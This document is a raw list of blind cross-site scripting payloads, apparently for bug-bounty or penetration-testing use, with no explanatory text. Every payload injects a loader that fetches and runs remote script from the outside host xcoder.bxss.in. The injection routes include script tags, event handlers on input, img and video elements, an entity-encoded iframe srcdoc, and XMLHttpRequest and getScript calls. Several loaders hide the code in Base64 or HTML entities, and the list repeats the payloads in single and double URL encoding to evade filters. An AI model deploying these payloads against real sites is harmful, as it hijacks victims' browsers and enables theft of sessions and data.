javascript:eval('var a=document.createElement('script');a.src='https://xcoder.bxss.in';document.body.appendChild(a)')

"><script src=https://xcoder.bxss.in></script>

"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veGNvZGVyLmJ4c3MuaW4iO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7&#61;&#61; autofocus>

"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veGNvZGVyLmJ4c3MuaW4iO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7&#61;&#61 onerror=eval(atob(this.id))>

"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veGNvZGVyLmJ4c3MuaW4iO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7&#61;&#61;>

"><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;xcoder.bxss.in&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">

<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//xcoder.bxss.in");a.send();</script>

<script>$.getScript("//xcoder.bxss.in")</script>





Single encode url
-------------------

%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fxcoder.bxss.in%3E%3C%2Fscript%3E


%3Cscript%3E%24.getScript%28%22%2F%2Fxcoder.bxss.in%22%29%3C%2Fscript%3E


javascript%3Aeval%28%27var%20a%3Ddocument.createElement%28%27script%27%29%3Ba.src%3D%27https%3A%2F%2Fxcoder.bxss.in%27%3Bdocument.body.appendChild%28a%29%27%29


%22%3E%3Cinput%20onfocus%3Deval%28atob%28this.id%29%29%20id%3DdmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veGNvZGVyLmJ4c3MuaW4iO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7%26%2361%3B%26%2361%3B%20autofocus%3E


%22%3E%3Cimg%20src%3Dx%20id%3DdmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veGNvZGVyLmJ4c3MuaW4iO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7%26%2361%3B%26%2361%20onerror%3Deval%28atob%28this.id%29%29%3E





Double encode url
------------------

%2522%253E%253Cscript%2520src%253Dhttps%253A%252F%252Fxcoder.bxss.in%253E%253C%252Fscript%253E


%253Cscript%253E%2524.getScript%2528%2522%252F%252Fxcoder.bxss.in%2522%2529%253C%252Fscript%253E


%2522%253E%253Cinput%2520onfocus%253Deval%2528atob%2528this.id%2529%2529%2520id%253DdmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veGNvZGVyLmJ4c3MuaW4iO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7%2526%252361%253B%2526%252361%253B%2520autofocus%253E


javascript%253Aeval%2528%2527var%2520a%253Ddocument.createElement%2528%2527script%2527%2529%253Ba.src%253D%2527https%253A%252F%252Fxcoder.bxss.in%2527%253Bdocument.body.appendChild%2528a%2529%2527%2529

